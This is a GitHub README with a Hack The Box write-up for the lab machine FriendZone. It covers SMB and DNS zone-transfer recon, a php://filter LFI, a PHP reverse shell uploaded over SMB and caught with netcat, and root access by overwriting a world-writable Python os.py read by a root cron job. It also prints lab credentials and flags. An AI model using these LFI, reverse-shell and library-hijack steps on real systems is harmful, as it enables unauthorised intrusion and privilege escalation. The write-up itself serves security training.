Skip to content

jebidiah-anthony/htb_friendzone

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
Screenshots
Screenshots
 
 
README.md
README.md
 
 
creds.txt
creds.txt
 
 
friendzone.nmap
friendzone.nmap
 
 
os.py
os.py
 
 
pspy64
pspy64
 
 
shell.php
shell.php
 
 
test.php
test.php
 
 

Repository files navigation

HTB FriendZone (10.10.10.123) Write-up

PART 1 : Initial Recon

nmap --min-rate 1000 -p- -v 10.10.10.123
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

nmap -oN friendzone -p21,22,53,80,139,445 -sC -sV -v 10.10.10.123
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: FRIENDZONE; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
| nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   FRIENDZONE<00>       Flags: <unique><active>
|   FRIENDZONE<03>       Flags: <unique><active>
|   FRIENDZONE<20>       Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-04-16T08:46:11+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-04-16 13:46:11
|_  start_date: N/A

Notes:

  • There is an FTP, SSH, DNS, HTTP, HTTPS, and SMB service available
  • The FTP service does not allow anonymous logins

PART 2 : Port Enumeration

  1. Explore SMB service

    1. Enumeration

      enum4linux -a 10.10.10.123
      ...

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.123    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

...

 =====================================
|    Session Check on 10.10.10.123    |
 =====================================
[+] Server 10.10.10.123 allows sessions using username '', password ''

...

 =========================================
|    Share Enumeration on 10.10.10.123    |
 =========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            FRIENDZONE

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$           Mapping: DENIED, Listing: N/A
//10.10.10.123/Files            Mapping: DENIED, Listing: N/A
//10.10.10.123/general          Mapping: OK, Listing: OK
//10.10.10.123/Development      Mapping: OK, Listing: OK
//10.10.10.123/IPC$             [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

...

      Notes:

      • Workgroup name is WORKGROUP
      • /etc/Files was listed as comment for Files share
      • general and Development shares does not require authentication

    2. Explore available shares

      1. //10.10.10.123/general 
        smbclient \\\\WORKGROUP\\general -I 10.10.10.123 -N
        • While inside the client: 
          dir     
# creds.txt      N     57  Wed Oct 10 07:52:42 2018

get creds.txt
        • creds.txt contents: 
          creds for the admin THING:

admin:WORKWORKHhallelujah@#
      2. //10.10.10.123/Development 
        smbclient \\\\WORKGROUP\\Development -I 10.10.10.123 -N
        • While inside the client: 
          dir
# .              D      0  Thu Jan 17 04:03:49 2019
# ..             D      0  Thu Jan 24 05:51:02 2019

      Notes:

      • general share contains admin credentials
      • Development share is empty

  2. Visit http://10.10.10.123

    • Page Source: 
      <title>Friend Zone Escape software</title>

<center><h2>Have you ever been friendzoned ?</h2></center>

<center><img src="fz.jpg"></center>

<center><h2>if yes, try to get out of this zone ;)</h2></center>

<center><h2>Call us at : +999999999</h2></center>

<center><h2>Email us at: info@friendzoneportal.red</h2></center>
      Notes:
      • friendzoneportal.red is a domain name

  3. Do a DNS lookup for friendzoneportal.red with zone transfer

    1. Enumeration: 
      dig @10.10.10.123 friendzoneportal.red axfr

# friendzoneportal.red.         604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
# friendzoneportal.red.         604800  IN     AAAA    ::1
# friendzoneportal.red.         604800  IN     NS      localhost.
# friendzoneportal.red.         604800  IN     A       127.0.0.1
# admin.friendzoneportal.red.   604800  IN     A       127.0.0.1
# files.friendzoneportal.red.   604800  IN     A       127.0.0.1
# imports.friendzoneportal.red. 604800  IN     A       127.0.0.1
# vpn.friendzoneportal.red.     604800  IN     A       127.0.0.1
# friendzoneportal.red.         604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
    2. Add subdomains to /etc/hosts 
      127.0.0.1       localhost
127.0.1.1       kali f
10.10.10.123    friendzoneportal.red
10.10.10.123    admin.friendzoneportal.red
10.10.10.123    files.friendzoneportal.red    \\\DEAD END
10.10.10.123    imports.friendzoneportal.red  \\\DEAD END
10.10.10.123    vpn.friendzoneportal.red      \\\DEAD END

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

  4. Visit http://admin.friendzoneportal.red

  5. Visit http://10.10.10.123:443

    • HTTP Response 
      <h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 443</address>
    • Switch to https://10.10.10.123
    • Check SSL Certificate 
      openssl s_client -connect 10.10.10.123:443 -quiet
      depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self signed certificate
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=10:certificate has expired
notAfter=Nov  4 21:02:30 2018 GMT
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
notAfter=Nov  4 21:02:30 2018 GMT
verify return:1

HTTP/1.1 400 Bad Request
Date: Tue, 16 Apr 2019 08:57:42 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 443</address>
</body></html>
      Notes:
      • friendzone.red is another domain name
      • Try accessing subdomains over https

  6. Visit https://admin.friendzoneportal.red

    • Page Source: 
      <title>Admin Page</title>

<center><h2>Login and break some friendzones !</h2></center>

<center><h2>Spread the love !</h2></center>

<center>
<form name="login" method="POST" action="login.php">

<p>Username : <input type="text" name="username"></p>
<p>Password : <input type="password" name="password"></p>
<p><input type="submit" value="Login"></p>

</form>
</center>
    • Response after successful logging using credentials from creds.txt 
      <h1>Admin page is not developed yet !!! check for another one</h1>

    Notes:

    • Maybe there is another admin page in friendzone.red

  7. Do a DNS lookup for friendzone.red with zone transfer

    1. Enumeration: 
      dig @10.10.10.123 friendzone.red axfr

# friendzone.red.                 604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
# friendzone.red.                 604800  IN     AAAA    ::1
# friendzone.red.                 604800  IN     NS      localhost.
# friendzone.red.                 604800  IN     A       127.0.0.1
# administrator1.friendzone.red.  604800  IN     A       127.0.0.1
# hr.friendzone.red.              604800  IN     A       127.0.0.1
# uploads.friendzone.red.         604800  IN     A       127.0.0.1
# friendzone.red.                 604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
    2. Add subdomains to /etc/hosts 
      127.0.0.1       localhost
127.0.1.1       kali f
10.10.10.123    friendzone.red
10.10.10.123    administrator1.friendzone.red
10.10.10.123    hr.friendzone.red             \\\DEAD END
10.10.10.123    uploads.friendzone.red        

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

  8. Visit https://administrator1.friendzone.red

    • Snippet from Page Source: 
      <form method="POST" action="login.php" name="Login" class="login-form">
  <input type="text" name="username" placeholder="username"/>
  <input type="password" name="password" placeholder="password"/>
  <button>login</button>
</form>
    • Response after successful logging using credentials from creds.txt 
      Login Done ! visit /dashboard.php

  9. Go to https://administrator1.friendzone.red/dashboard.php

    • Page Source: 
      <title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>        
<br><br>
<center><p>image_name param is missed !</p></center>
<center><p>please enter it to show the image</p></center>
<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>
    • /dashboard.php?image_id=a.jpg&pagename=timestamp 
      <title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>  
<center>
  <img src='images/a.jpg'></center><center>
  <h1>Something went worng ! , the script include wrong param !</h1>
</center>
Final Access timestamp is 1555410914

    Notes:

    • The image_id parameter is loaded from a directory images/
    • The pagename parameter might be exploitable

PART 3 : Generate User Shell

  1. Exploit pagename parameter from https://administrator1.friendzone.red/dashboard.php

    • Attempt LFI using php://filter 
      /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp
      Page Source: 
      <title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo=
      Decoding the base64 output: 
      echo PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo= | base64 --decode
      The source code for timestamp.php appears: 
      <?php


$time_final = time() + 3600;

echo "Final Access timestamp is $time_final";


?>
    • Now try reading other files (e.g. dashboard.php) 
      /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard
      Page Source: 
      <title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo=
      Decoding the base64 output: 
      echo PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo= | base64 --decode
      The source code for dashboard.php appears: 
      <?php

//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer andthe application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];

if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
  echo "<br><br><br>";

  echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
  echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";

  if(!isset($_GET["image_id"])){
    echo "<br><br>";
    echo "<center><p>image_name param is missed !</p></center>";
    echo "<center><p>please enter it to show the image</p></center>";
    echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
  } else {
    $image = $_GET["image_id"];
    echo "<center><img src='images/$image'></center>";

    echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
    include($_GET["pagename"].".php");
    //echo $_GET["pagename"];
  }
} else {
  echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
      Notes:
      • dashboard.php gets the filename of PHP files and then adds the extension .php
      • dashboard.php runs the file from the pagename parameter
      • Upload a malicious PHP file and access it using dashboard.php

  2. Explore https://uploads.friendzone.red

    • Page Source:

      <title>FriendZone Escape software upload manager</title>

<body>
<center><h2>Want to upload Stuff ??</h2></center>

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select an image to upload (only images):
    <input type="file" name="imageu" id="file">
    <input type="hidden" name="image">
    <input type="submit" value="Upload" name="Upload">
</form>

</body>

    • Test if it accepts non-image files

      • Create payload (test.php) 
        echo "<?php echo \"hello world\"; ?>" > test.php
      • Response after uploading test.php 
        Uploaded successfully !<br>1555476301

      Notes:

      • It accepts non-image files
      • The directory of the uploaded files is still unknown

    • Find the uploaded files

      gobuster -k -u https://uploads.friendzone.red/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt 
# /files (Status: 301)

gobuster -k -u https://uploads.friendzone.red/files -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
# /note (Status: 200)

      Visiting https://uploads.friendzone.red/files/note

      under development !

      Notes:

      • Perhaps "under development" points to the Development share from earlier

  3. Check if test.php was really successfully uploaded

    • Reopen Development share:

      smbclient \\\\WORKGROUP\\Development -I 10.10.10.123 -N

      While inside the client:

      dir
# .              D      0  Thu Jan 17 04:03:49 2019
# ..             D      0  Thu Jan 24 05:51:02 2019

      Notes:

      • The Development share is still empty

    • Try to read the source code of upload.php

      /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=../uploads/upload

      Page Source:

      <title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K

      Decoding the base64 output:

      echo PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K | base64 --decode

      The source code for ../uploads/upload.php appears:

      <?php

// not finished yet -- friendzone admin !

if(isset($_POST["image"])){

echo "Uploaded successfully !<br>";
echo time()+3600;
}else{

echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";

}

?>

      Notes:

  4. Linking the Development share and dashboard.php

    • Upload test.php directly to the Development share

      smbclient \\\\WORKGROUP\\Development -c "put test.php test.php" -I 10.10.10.123 -N   
# putting file test.php as \test.php (0.0 kb/s) (average 0.0 kb/s)

      Notes:

      • /etc/Files was commented for the Files share during share enumeration in enum4linux
      • Maybe files in the Development share are saved in /etc/Development

    • Attempt LFI at the /etc/Development directory using dashboard.php

      /dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

      Page Source:

      <title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
hello world

      Notes:

      • The files in the Development share are indeed saved in /etc/Development

    • Upload PHP reverse shell

      • Download shell from pentestmonkey
      • Update values of $ip and $port
      • Upload to the Development share 
        smbclient \\\\WORKGROUP\\Development -c "put shell.php shell.php" -I 10.10.10.123 -N
# putting file shell.php as \shell.php (7.0 kb/s) (average 7.0 kb/s)

    • Establish shell

      • Set-up local netcat listener: 
        nc -lvp 4444
      • Run shell using dashboard.php: 
        https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell

    • While inside the shell:

      id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd | grep bash
# root:x:0:0:root:/root:/bin/bash
# friend:x:1000:1000:friend,,,:/home/friend:/bin/bash

find /var/www -name *conf* 2>/dev/null
# /var/www/mysql_data.conf

cat /var/www/mysql_data.conf

      /var/www/mysql_data.conf contents:

      for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

      Notes:

      • There exists a user named friend
      • There are credentials for friend in /var/www/mysql_data.conf

  5. Login via SSH as user (friend)

    ssh -l friend 10.10.10.123
# friend@10.10.10.123's password: Agpyu12!0.213$
    • While inside shell: 
      find ~ -name user.txt
# /home/friend/user.txt

cat /home/friend/user.txt
# a9ed20acecd6c5b6b52f474e15ae9a11

PART 4 : Privilege Escalation (friend -> root)

  1. Download and upload pspy

    1. Check system architecture of FriendZone 
      uname -op
# x86_64 GNU/Linux
      Notes:
      • The system runs on 64-bit
    2. Upload pspy64 to FriendZone
      • Local terminal: 
        python -m SimpleHTTPServer
# Serving HTTP on 0.0.0.0 port 8000 ...
      • FriendZone terminal: 
        wget http://10.10.12.72:8000/pspy64

chmod +x pspy64

  2. Run pspy64

    ./pspy64
# ...
# 54:01 CMD: UID=0    PID=7356   | /bin/sh -c /opt/server_admin/reporter.py 
# 54:01 CMD: UID=0    PID=7355   | /bin/sh -c /opt/server_admin/reporter.py 
# 54:01 CMD: UID=0    PID=7354   | /usr/sbin/CRON -f
# ...
# 56:01 CMD: UID=0    PID=7456   | /bin/sh -c /opt/server_admin/reporter.py 
# 56:01 CMD: UID=0    PID=7455   | /bin/sh -c /opt/server_admin/reporter.py 
# 56:01 CMD: UID=0    PID=7454   | /usr/sbin/CRON -f 
# ...
# 58:02 CMD: UID=0    PID=7540   | /bin/sh -c /opt/server_admin/reporter.py 
# 58:02 CMD: UID=0    PID=7539   | /bin/sh -c /opt/server_admin/reporter.py 
# 58:02 CMD: UID=0    PID=7538   | /usr/sbin/CRON -f
# ...

    Notes:

    • There is a script called reporter.py
    • It runs every two minutes

  3. Check reporter.py

    cat /opt/server_admin/reporter.py
    #!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

    Notes:

    • The script runs in python2.7
    • Maybe we can override the os library

  4. Override the os library

    • Check the directory of reporter.py 
      ls -la /opt | grep server_admin
# drwxr-xr-x  2 root root 4096 Jan 24 00:57 server_admin
      Notes:
      • Non-root users cannot write to the directory
    • Check where os.py is saved 
      find / -name os.py 2>/dev/null
# /usr/lib/python3.6/os.py
# /usr/lib/python2.7/os.py

ls -la /usr/lib/python2.7/os.py
# -rwxrwxrwx 1 root root 25912 Apr 17 08:33 /usr/lib/python2.7/os.py
      Notes:
      • os.py could be overwritten by anyone
    • Overwrite os.py 
      echo "infile = open(\"/root/root.txt\", \"r\").read()" > /usr/lib/python2.7/os.py
echo "outfile = open(\"/tmp/root.txt\", \"w\").write(infile)" >> /usr/lib/python2.7/os.py
echo "outfile.close()" >> /usr/lib/python2.7/os.py

  5. After reporter.py runs again:

    cat /tmp/root.txt
# b0e6c60b82cf96e9855ac1656a9e90c7

About

HTB FriendZone (10.10.10.123)

Topics

writeup boot2root htb hackthebox lfi-vulnerability python-library-hijacking

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages